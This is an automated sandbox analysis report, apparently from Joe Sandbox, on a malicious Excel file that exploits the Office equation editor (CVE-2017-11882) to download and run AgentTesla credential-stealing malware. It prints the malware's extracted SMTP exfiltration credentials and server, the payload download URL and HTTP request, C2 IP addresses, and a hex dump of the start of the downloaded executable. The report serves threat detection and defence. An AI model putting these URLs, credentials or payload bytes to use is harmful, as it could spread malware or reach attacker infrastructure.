Play interactive tour

Edit tour

Analysis Report TACSAL.xlsx

Overview

General Information

Sample Name:	TACSAL.xlsx
Analysis ID:	344848
MD5:	04295ba63eaeb18f062045b0d0106670
SHA1:	daf3e6043fa67319bf7090cdc60bec6303c7f78e
SHA256:	fbc7b775eaa32cdc8daffe7a3db74bc36e06bab32b53d5d65eceb76081f664cd
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Yara detected AntiVM_3

.NET source code contains very large array initializations

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 532 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2520 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2736 cmdline: 'C:\Users\Public\vbc.exe' MD5: 411FA0337649AD03B57D223E60680397)

vbc.exe (PID: 2836 cmdline: C:\Users\Public\vbc.exe MD5: 411FA0337649AD03B57D223E60680397)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "IWR6Nyjr", "URL: ": "https://FTlR0ss5usK.net", "To: ": "facturacion@migeulez.com", "ByHost: ": "smtp.migeulez.com:587", "Password: ": "DjnM0fJ0EN49rH", "From: ": "facturacion@migeulez.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000002.2370560370.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2159922481.00000000023C1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000002.2371263271.0000000002618000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2160179580.00000000033C8000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vbc.exe PID: 2836	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vbc.exe PID: 2836	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vbc.exe PID: 2736	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vbc.exe PID: 2736	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.vbc.exe.400000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2520, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2736

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 103.153.76.181, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2520, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2520, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://suresb1sndyintercont.dns.army/receipst/winlog.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: vbc.exe.2836.5.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "IWR6Nyjr", "URL: ": "https://FTlR0ss5usK.net", "To: ": "facturacion@migeulez.com", "ByHost: ": "smtp.migeulez.com:587", "Password: ": "DjnM0fJ0EN49rH", "From: ": "facturacion@migeulez.com"}

Multi AV Scanner detection for domain / URL

Show sources

Source: http://suresb1sndyintercont.dns.army/receipst/winlog.exe

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: TACSAL.xlsx

Virustotal: Detection: 31%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		4_2_0022D167
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		4_2_0022D178

Source: global traffic

DNS query: name: suresb1sndyintercont.dns.army

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 103.153.76.181:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 103.153.76.181:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49166 -> 208.91.199.225:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49167 -> 208.91.198.143:587

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://FTlR0ss5usK.net

Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 208.91.199.225:587
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 208.91.198.143:587

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Jan 2021 08:15:44 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34Last-Modified: Wed, 27 Jan 2021 06:00:08 GMTETag: "106000-5b9db7bb52a00"Accept-Ranges: bytesContent-Length: 1073152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 0f 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c6 0e 00 00 98 01 00 00 00 00 00 9e e5 0e 00 00 20 00 00 00 00 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c e5 0e 00 4f 00 00 00 00 00 0f 00 7c 95 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 c5 0e 00 00 20 00 00 00 c6 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7c 95 01 00 00 00 0f 00 00 96 01 00 00 c8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 10 00 00 02 00 00 00 5e 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 e5 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 98 43 02 00 1c 5c 01 00 03 00 00 00 01 00 00 06 b4 9f 03 00 98 45 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 16 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 70 04 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a

Source: Joe Sandbox View	IP Address: 208.91.198.143 208.91.198.143
Source: Joe Sandbox View	IP Address: 208.91.199.225 208.91.199.225

Source: Joe Sandbox View	ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View	ASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK

Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 208.91.199.225:587
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 208.91.198.143:587

Source: global traffic

HTTP traffic detected: GET /receipst/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: suresb1sndyintercont.dns.armyConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E243FB15.emf

Jump to behavior

Source: global traffic

Source: unknown

DNS traffic detected: queries for: suresb1sndyintercont.dns.army

Source: vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp	String found in binary or memory: http://GhlhtO.com
Source: vbc.exe, 00000005.00000002.2372183882.0000000005DF0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2159922481.00000000023C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2371340918.00000000026D6000.00000004.00000001.sdmp	String found in binary or memory: http://smtp.migeulez.com
Source: vbc.exe, 00000005.00000002.2371340918.00000000026D6000.00000004.00000001.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: vbc.exe, 00000005.00000002.2372183882.0000000005DF0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: E243FB15.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000005.00000002.2371263271.0000000002618000.00000004.00000001.sdmp	String found in binary or memory: https://FTlR0ss5usK.net
Source: vbc.exe, 00000005.00000002.2371263271.0000000002618000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%
Source: vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, 00000004.00000002.2160179580.00000000033C8000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2370560370.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing from the 19 , yelbw bar above 20 This document is 21 t , 3. Once you have enable
Source: Screenshot number: 4	Screenshot OCR: Enable Content from the yellow rabove 23 24 25 26 27 28 29 30 " " " " " 31 0 0 0 0 ~ -

.NET source code contains very large array initializations

Show sources

Source: 5.2.vbc.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bBFB9D646u002dAC94u002d4CA6u002dB029u002d37D6F36F4C26u007d/u0033AB94A16u002dE084u002d41F8u002d8920u002d70575B436CD7.cs

Large array initialization: .cctor: array initializer size 11954

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00222148	4_2_00222148
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00221BA0	4_2_00221BA0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00221E90	4_2_00221E90
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00223AA7	4_2_00223AA7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00223AB8	4_2_00223AB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00225320	5_2_00225320
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00226340	5_2_00226340
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00222089	5_2_00222089
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00225668	5_2_00225668
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0022E858	5_2_0022E858
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0070E890	5_2_0070E890
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00705288	5_2_00705288
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00708960	5_2_00708960
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00701DD0	5_2_00701DD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0070BBC0	5_2_0070BBC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0070C990	5_2_0070C990
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00707F88	5_2_00707F88
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00840048	5_2_00840048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00844F5F	5_2_00844F5F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00700048	5_2_00700048

Source: TACSAL.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: winlog[1].exe.2.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: winlog[1].exe.2.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 5.2.vbc.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.vbc.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/8@8/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$TACSAL.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRFCC5.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: TACSAL.xlsx

Virustotal: Detection: 31%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: TACSAL.xlsx

Static file information: File size 2411520 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: TACSAL.xlsx

Initial sample: OLE indicators vbamacros = False

Source: TACSAL.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0022CE58 push esp; retf 0022h

4_2_0022CE59

Source: initial sample

Static PE information: section name: .text entropy: 7.67209039123

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
